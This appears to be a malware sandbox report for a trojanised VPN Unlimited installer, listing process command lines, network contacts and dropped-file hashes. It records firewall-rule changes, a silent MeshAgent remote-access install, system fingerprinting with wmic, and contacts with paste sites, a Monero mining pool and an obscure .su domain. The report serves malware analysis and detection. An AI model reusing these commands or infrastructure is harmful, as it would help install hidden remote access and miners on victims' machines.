"C:\Program Files (x86)\VPN Unlimited\vpnu-push.exe" --only-create-shortcut
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="OpenVPN"
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" /r remove =net *Wintun
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" /r remove =net *WireGuard
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" remove tap0901
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" install OemVista.inf tap0901
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="VPN Unlimited" dir=in action=allow program="C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" enable=yes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{f6eb349c-baf2-f946-9412-d0c56a14859e}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\vpn unlimited\recovery\tap\x64"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="VPN Unlimited" dir=out action=allow program="C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" enable=yes
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000150" "31c1"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="OpenVPN" dir=in action=allow program="C:\Program Files (x86)\VPN Unlimited\openvpn.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="OpenVPN" dir=out action=allow program="C:\Program Files (x86)\VPN Unlimited\openvpn.exe" enable=yes
C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe
"C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe" -fullinstall
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6c096464-b4b4-439b-a21d-dc9d58a45730}
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Users\Admin\AppData\Local\Temp\4dab861c5f15add1529fa378ceef1272
"C:\Users\Admin\AppData\Local\Temp\4dab861c5f15add1529fa378ceef1272"
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39df055 /state1:0x41c64e6d
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| CZ | 46.8.227.16:80 | 46.8.227.16 | tcp |
| FR | 141.94.96.195:443 | pool.supportxmr.com | tcp |
| US | 104.26.3.16:443 | rentry.co | tcp |
| PL | 83.168.108.45:443 | justpaste.it | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.21.19.3:443 | jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | tcp |
| CZ | 46.8.227.16:80 | 46.8.227.16 | tcp |
| DE | 193.233.254.155:443 | tcp | |
| US | 8.8.8.8:53 | 155.254.233.193.in-addr.arpa | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| N/A | 127.0.0.1:52682 | tcp | |
| N/A | 127.0.0.1:52684 | tcp | |
| US | 104.21.19.3:443 | jaiodsnvzxkxcz5hvxzkighiwagfew9oi0d3219v687dyfsdg.su | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\jgt.exe
| MD5 | 1417d38c40d85d1c4eb7fad3444ca069 |
| SHA1 | 27d8e2ca9537c80d1c1148830f9a6499f1e3e797 |
| SHA256 | 5f7c6cdea3c4e825af1d796cbd34b2d45b2b6fabed130e717a30a6d871993f5d |
| SHA512 | a169f8c5925977a984bc00a2b379205ed527777865215e4ffdfeb30084d1ed08f7bb5222db8898161f1e6151d4a75e8ccc366543cf041e47effc21dcf4c351ab |
memory/1700-71-0x0000000000400000-0x00000000004F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-GSJ18.tmp\VPN_Unlimited_v9.3.2_64.tmp
| MD5 | 5b16ce0d91e8e275b88fec9fe288d519 |
| SHA1 | 6a22411e2b9e50300e5be2bbabaa136ce3cc7ef5 |
| SHA256 | 4c8ca58ccee5032b2529103636cbea664c401a287a296493a477d9619852eeaa |
| SHA512 | 00643260f19396df1b44cce93cca8d6c636fc89741e301ee163a84321ee59e455453904f92e81a6b8f9a28a100d03275e997bfebd6390cb00870947b21a28b3c |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
| MD5 | 48c96771106dbdd5d42bba3772e4b414 |
| SHA1 | e84749b99eb491e40a62ed2e92e4d7a790d09273 |
| SHA256 | a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22 |
| SHA512 | 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\i386\jvm.cfg
| MD5 | 9fd47c1a487b79a12e90e7506469477b |
| SHA1 | 7814df0ff2ea1827c75dcd73844ca7f025998cc6 |
| SHA256 | a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e |
| SHA512 | 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcr100.dll
| MD5 | bf38660a9125935658cfa3e53fdc7d65 |
| SHA1 | 0b51fb415ec89848f339f8989d323bea722bfd70 |
| SHA256 | 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa |
| SHA512 | 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\verify.dll
| MD5 | de2167a880207bbf7464bcd1f8bc8657 |
| SHA1 | 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7 |
| SHA256 | fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3 |
| SHA512 | bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\client\jvm.dll
| MD5 | 39c302fe0781e5af6d007e55f509606a |
| SHA1 | 23690a52e8c6578de6a7980bb78aae69d0f31780 |
| SHA256 | b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc |
| SHA512 | 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\java.dll
| MD5 | 73bd0b62b158c5a8d0ce92064600620d |
| SHA1 | 63c74250c17f75fe6356b649c484ad5936c3e871 |
| SHA256 | e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30 |
| SHA512 | eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\meta-index
| MD5 | 91aa6ea7320140f30379f758d626e59d |
| SHA1 | 3be2febe28723b1033ccdaa110eaf59bbd6d1f96 |
| SHA256 | 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4 |
| SHA512 | 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\zip.dll
| MD5 | cb99b83bbc19cd0e1c2ec6031d0a80bc |
| SHA1 | 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd |
| SHA256 | 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec |
| SHA512 | 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\ext\meta-index
| MD5 | 77abe2551c7a5931b70f78962ac5a3c7 |
| SHA1 | a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc |
| SHA256 | c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4 |
| SHA512 | 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935 |
C:\Users\Admin\AppData\Roaming\Installer\lib\asm-all.jar
| MD5 | f5ad16c7f0338b541978b0430d51dc83 |
| SHA1 | 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a |
| SHA256 | 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d |
| SHA512 | 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a |
C:\Users\Admin\AppData\Roaming\Installer\lib\dn-compiled-module.jar
| MD5 | bd1f1a2246004487d4c84a233cea37f7 |
| SHA1 | 24b9e6f765da1bcd2d424fd28b68fc40e368520e |
| SHA256 | 5183a2bca7735453b7fd5ca57ebb47ad32dd82d830eaddafed50a658164bdd76 |
| SHA512 | 800e6a5dd529e9627320c7989720c0086a76ca7fbca6d3ccfcfea04871017a0f212926ccf3b4c16c958615e5ca0db19a53ccee53f17034384eb8c9c933e7608c |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-gui-ext.jar
| MD5 | 6696368a09c7f8fed4ea92c4e5238cee |
| SHA1 | f89c282e557d1207afd7158b82721c3d425736a7 |
| SHA256 | c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4 |
| SHA512 | 0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76 |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-desktop-ext.jar
| MD5 | b50e2c75f5f0e1094e997de8a2a2d0ca |
| SHA1 | d789eb689c091536ea6a01764bada387841264cb |
| SHA256 | cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23 |
| SHA512 | 57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0 |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-core.jar
| MD5 | 7e5e3d6d352025bd7f093c2d7f9b21ab |
| SHA1 | ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57 |
| SHA256 | 5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a |
| SHA512 | c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-app-framework.jar
| MD5 | 0c8768cdeb3e894798f80465e0219c05 |
| SHA1 | c4da07ac93e4e547748ecc26b633d3db5b81ce47 |
| SHA256 | 15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669 |
| SHA512 | 35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106 |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-runtime.jar
| MD5 | d5ef47c915bef65a63d364f5cf7cd467 |
| SHA1 | f711f3846e144dddbfb31597c0c165ba8adf8d6b |
| SHA256 | 9c287472408857301594f8f7bda108457f6fdae6e25c87ec88dbf3012e5a98b6 |
| SHA512 | 04aeb956bfcd3bd23b540f9ad2d4110bb2ffd25fe899152c4b2e782daa23a676df9507078ecf1bfc409ddfbe2858ab4c4c324f431e45d8234e13905eb192bae8 |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-json-ext.jar
| MD5 | fde38932b12fc063451af6613d4470cc |
| SHA1 | bc08c114681a3afc05fb8c0470776c3eae2eefeb |
| SHA256 | 9967ea3c3d1aee8db5a723f714fba38d2fc26d8553435ab0e1d4e123cd211830 |
| SHA512 | 0f211f81101ced5fff466f2aab0e6c807bb18b23bc4928fe664c60653c99fa81b34edf5835fcc3affb34b0df1fa61c73a621df41355e4d82131f94fcc0b0e839 |
C:\Users\Admin\AppData\Roaming\Installer\lib\gson.jar
| MD5 | 5134a2350f58890ffb9db0b40047195d |
| SHA1 | 751f548c85fa49f330cecbb1875893f971b33c4e |
| SHA256 | 2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32 |
| SHA512 | c3cdaf66a99e6336abc80ff23374f6b62ac95ab2ae874c9075805e91d849b18e3f620cc202b4978fc92b73d98de96089c8714b1dd096b2ae1958cfa085715f7a |
C:\Users\Admin\AppData\Roaming\Installer\lib\dn-php-sdk.jar
| MD5 | 3e5e8cccff7ff343cbfe22588e569256 |
| SHA1 | 66756daa182672bff27e453eed585325d8cc2a7a |
| SHA256 | 0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4 |
| SHA512 | 8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\ext\jfxrt.jar
| MD5 | 042b3675517d6a637b95014523b1fd7d |
| SHA1 | 82161caf5f0a4112686e4889a9e207c7ba62a880 |
| SHA256 | a570f20f8410f9b1b7e093957bf0ae53cae4731afaea624339aa2a897a635f22 |
| SHA512 | 7672d0b50a92e854d3bd3724d01084cc10a90678b768e9a627baf761993e56a0c6c62c19155649fe9a8ceeabf845d86cbbb606554872ae789018a8b66e5a2b35 |
memory/2232-310-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
memory/2232-313-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-xml-ext.jar
| MD5 | 0a79304556a1289aa9e6213f574f3b08 |
| SHA1 | 7ee3bde3b1777bf65d4f62ce33295556223a26cd |
| SHA256 | 434e57fffc7df0b725c1d95cabafdcdb83858ccb3e5e728a74d3cf33a0ca9c79 |
| SHA512 | 1560703d0c162d73c99cef9e8ddc050362e45209cc8dea6a34a49e2b6f99aae462eae27ba026bdb29433952b6696896bb96998a0f6ac0a3c1dbbb2f6ebc26a7e |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-zend-ext.jar
| MD5 | 4bc2aea7281e27bc91566377d0ed1897 |
| SHA1 | d02d897e8a8aca58e3635c009a16d595a5649d44 |
| SHA256 | 4aef566bbf3f0b56769a0c45275ebbf7894e9ddb54430c9db2874124b7cea288 |
| SHA512 | da35bb2f67bca7527dc94e5a99a162180b2701ddca2c688d9e0be69876aca7c48f192d0f03d431ccd2d8eec55e0e681322b4f15eba4db29ef5557316e8e51e10 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\currency.data
| MD5 | f6258230b51220609a60aa6ba70d68f3 |
| SHA1 | b5b95dd1ddcd3a433db14976e3b7f92664043536 |
| SHA256 | 22458853da2415f7775652a7f57bb6665f83a9ae9fb8bd3cf05e29aac24c8441 |
| SHA512 | b2dfcfdebf9596f2bb05f021a24335f1eb2a094dca02b2d7dd1b7c871d5eecda7d50da7943b9f85edb5e92d9be6b6adfd24673ce816df3960e4d68c7f894563f |
C:\Users\Admin\AppData\Roaming\Installer\lib\jphp-zip-ext.jar
| MD5 | 20f6f88989e806d23c29686b090f6190 |
| SHA1 | 1fdb9a66bb5ca587c05d3159829a8780bb66c87d |
| SHA256 | 9d5f06d539b91e98fd277fc01fd2f9af6fea58654e3b91098503b235a83abb16 |
| SHA512 | 2798bb1dd0aa121cd766bd5b47d256b1a528e9db83ed61311fa685f669b7f60898118ae8c69d2a30d746af362b810b133103cbe426e0293dd2111aca1b41ccea |
C:\Users\Admin\AppData\Roaming\Installer\lib\slf4j-api.jar
| MD5 | caafe376afb7086dcbee79f780394ca3 |
| SHA1 | da76ca59f6a57ee3102f8f9bd9cee742973efa8a |
| SHA256 | 18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79 |
| SHA512 | 5dd6271fd5b34579d8e66271bab75c89baca8b2ebeaa9966de391284bd08f2d720083c6e0e1edda106ecf8a04e9a32116de6873f0f88c19c049c0fe27e5d820b |
C:\Users\Admin\AppData\Roaming\Installer\lib\slf4j-simple.jar
| MD5 | 722bb90689aecc523e3fe317e1f0984b |
| SHA1 | 8dacf9514f0c707cbbcdd6fd699e8940d42fb54e |
| SHA256 | 0966e86fffa5be52d3d9e7b89dd674d98a03eed0a454fbaf7c1bd9493bd9d874 |
| SHA512 | d5effbfa105bcd615e56ef983075c9ef0f52bcfdbefa3ce8cea9550f25b859e48b32f2ec9aa7a305c6611a3be5e0cde0d269588d9c2897ca987359b77213331d |
C:\Users\Admin\AppData\Roaming\Installer\lib\zt-zip.jar
| MD5 | 0fd8bc4f0f2e37feb1efc474d037af55 |
| SHA1 | add8fface4c1936787eb4bffe4ea944a13467d53 |
| SHA256 | 1e31ef3145d1e30b31107b7afc4a61011ebca99550dce65f945c2ea4ccac714b |
| SHA512 | 29de5832db5b43fdc99bb7ea32a7359441d6cf5c05561dd0a6960b33078471e4740ee08ffbd97a5ced4b7dd9cc98fad6add43edb4418bf719f90f83c58188149 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\security\java.security
| MD5 | 409c132fe4ea4abe9e5eb5a48a385b61 |
| SHA1 | 446d68298be43eb657934552d656fa9ae240f2a2 |
| SHA256 | 4d9e5a12b8cac8b36ecd88468b1c4018bc83c97eb467141901f90358d146a583 |
| SHA512 | 7fed286ac9aed03e2dae24c3864edbbf812b65965c7173cc56ce622179eb5f872f77116275e96e1d52d1c58d3cdebe4e82b540b968e95d5da656aa74ad17400d |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\jsse.jar
| MD5 | fd1434c81219c385f30b07e33cef9f30 |
| SHA1 | 0b5ee897864c8605ef69f66dfe1e15729cfcbc59 |
| SHA256 | bc3a736e08e68ace28c68b0621dccfb76c1063bd28d7bd8fce7b20e7b7526cc5 |
| SHA512 | 9a778a3843744f1fabad960aa22880d37c30b1cab29e123170d853c9469dc54a81e81a9070e1de1bf63ba527c332bb2b1f1d872907f3bdce33a6898a02fef22d |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\net.dll
| MD5 | 691b937a898271ee2cffab20518b310b |
| SHA1 | abedfcd32c3022326bc593ab392dea433fcf667c |
| SHA256 | 2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61 |
| SHA512 | 1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\nio.dll
| MD5 | 95edb3cb2e2333c146a4dd489ce67cbd |
| SHA1 | 79013586a6e65e2e1f80e5caf9e2aa15b7363f9a |
| SHA256 | 96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31 |
| SHA512 | ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\tzdb.dat
| MD5 | 5a7f416bd764e4a0c2deb976b1d04b7b |
| SHA1 | e12754541a58d7687deda517cdda14b897ff4400 |
| SHA256 | a636afa5edba8aa0944836793537d9c5b5ca0091ccc3741fc0823edae8697c9d |
| SHA512 | 3ab2ad86832b98f8e5e1ce1c1b3ffefa3c3d00b592eb1858e4a10fff88d1a74da81ad24c7ec82615c398192f976a1c15358fce9451aa0af9e65fb566731d6d8f |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\tzmappings
| MD5 | b8dd8953b143685b5e91abeb13ff24f0 |
| SHA1 | b5ceb39061fce39bb9d7a0176049a6e2600c419c |
| SHA256 | 3d49b3f2761c70f15057da48abe35a59b43d91fa4922be137c0022851b1ca272 |
| SHA512 | c9cd0eb1ba203c170f8196cbab1aaa067bcc86f2e52d0baf979aad370edf9f773e19f430777a5a1c66efe1ec3046f9bc82165acce3e3d1b8ae5879bd92f09c90 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\resources.jar
| MD5 | 9a084b91667e7437574236cd27b7c688 |
| SHA1 | d8926cc4aa12d6fe9abe64c8c3cb8bc0f594c5b1 |
| SHA256 | a1366a75454fc0f1ca5a14ea03b4927bb8584d6d5b402dfa453122ae16dbf22d |
| SHA512 | d603aa29e1f6eefff4b15c7ebc8a0fa18e090d2e1147d56fd80581c7404ee1cb9d6972fcf2bd0cb24926b3af4dfc5be9bce1fe018681f22a38adaa278bf22d73 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcr120.dll
| MD5 | 034ccadc1c073e4216e9466b720f9849 |
| SHA1 | f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1 |
| SHA256 | 86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f |
| SHA512 | 5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcp120.dll
| MD5 | fd5cabbe52272bd76007b68186ebaf00 |
| SHA1 | efd1e306c1092c17f6944cc6bf9a1bfad4d14613 |
| SHA256 | 87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608 |
| SHA512 | 1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\prism_d3d.dll
| MD5 | 5aadadf700c7771f208dda7ce60de120 |
| SHA1 | e9cf7e7d1790dc63a58106c416944fd6717363a5 |
| SHA256 | 89dac9792c884b70055566564aa12a8626c3aa127a89303730e66aba3c045f79 |
| SHA512 | 624431a908c2a835f980391a869623ee1fa1f5a1a41f3ee08040e6395b8c11734f76fe401c4b9415f2055e46f60a7f9f2ac0a674604e5743ab8301dbadf279f2 |
memory/2232-367-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\glass.dll
| MD5 | 434cbb561d7f326bbeffa2271ecc1446 |
| SHA1 | 3d9639f6da2bc8ac5a536c150474b659d0177207 |
| SHA256 | 1edd9022c10c27bbba2ad843310458edaead37a9767c6fc8fddaaf1adfcbc143 |
| SHA512 | 9e37b985ecf0b2fef262f183c1cd26d437c8c7be97aa4ec4cd8c75c044336cc69a56a4614ea6d33dc252fe0da8e1bbadc193ff61b87be5dce6610525f321b6dc |
memory/2232-372-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
memory/2232-377-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javafx_font.dll
| MD5 | aeada06201bb8f5416d5f934aaa29c87 |
| SHA1 | 35bb59febe946fb869e5da6500ab3c32985d3930 |
| SHA256 | f8f0b1e283fd94bd87abca162e41afb36da219386b87b0f6a7e880e99073bda3 |
| SHA512 | 89bad9d1115d030b98e49469275872fff52d8e394fe3f240282696cf31bccf0b87ff5a0e9a697a05befcfe9b24772d65ed73c5dbd168eed111700caad5808a78 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\awt.dll
| MD5 | 159ccf1200c422ced5407fed35f7e37d |
| SHA1 | 177a216b71c9902e254c0a9908fcb46e8d5801a9 |
| SHA256 | 30eb581c99c8bcbc54012aa5e6084b6ef4fcee5d9968e9cc51f5734449e1ff49 |
| SHA512 | ab3f4e3851313391b5b8055e4d526963c38c4403fa74fb70750cc6a2d5108e63a0e600978fa14a7201c48e1afd718a1c6823d091c90d77b17562b7a4c8c40365 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\accessibility.properties
| MD5 | 9e5e954bc0e625a69a0a430e80dcf724 |
| SHA1 | c29c1f37a2148b50a343db1a4aa9eb0512f80749 |
| SHA256 | a46372b05ce9f40f5d5a775c90d7aa60687cd91aaa7374c499f0221229bf344e |
| SHA512 | 18a8277a872fb9e070a1980eee3ddd096ed0bba755db9b57409983c1d5a860e9cbd3b67e66ff47852fe12324b84d4984e2f13859f65fabe2ff175725898f1b67 |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\jfr.jar
| MD5 | ccb395235c35c3acba592b21138cc6ab |
| SHA1 | 29c463aa4780f13e77fb08cc151f68ca2b2958d5 |
| SHA256 | 27ad8ea5192ee2d91ba7a0eace9843cb19f5e145259466158c2f48c971eb7b8f |
| SHA512 | d4c330741387f62dd6e52b41167cb11abd8615675fe7e1c14ae05a52f87a348cbc64b56866ae313b2906b33ce98be73681f769a4a54f6fe9a7d056f88cf9a4e1 |
memory/2232-395-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
memory/2232-397-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
memory/2232-418-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
memory/1700-420-0x0000000000400000-0x00000000004F2000-memory.dmp
memory/4108-423-0x0000000000400000-0x000000000072E000-memory.dmp
memory/2232-424-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gi5pjlw.igp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4732-431-0x00000139FE920000-0x00000139FE942000-memory.dmp
memory/2232-437-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
memory/3948-442-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3948-440-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3948-441-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3948-439-0x0000000140000000-0x000000014002B000-memory.dmp
memory/3948-444-0x0000000140000000-0x000000014002B000-memory.dmp
memory/2232-457-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
memory/552-472-0x0000029652DB0000-0x0000029652DCC000-memory.dmp
memory/552-473-0x0000029652DD0000-0x0000029652E83000-memory.dmp
memory/552-474-0x0000029652DA0000-0x0000029652DAA000-memory.dmp
memory/552-475-0x0000029652FB0000-0x0000029652FCC000-memory.dmp
memory/552-476-0x0000029652F90000-0x0000029652F9A000-memory.dmp
memory/552-477-0x0000029652FF0000-0x000002965300A000-memory.dmp
memory/552-479-0x0000029652FA0000-0x0000029652FA8000-memory.dmp
memory/552-480-0x0000029652FD0000-0x0000029652FD6000-memory.dmp
memory/552-481-0x0000029652FE0000-0x0000029652FEA000-memory.dmp
memory/2164-494-0x0000000140000000-0x000000014000E000-memory.dmp
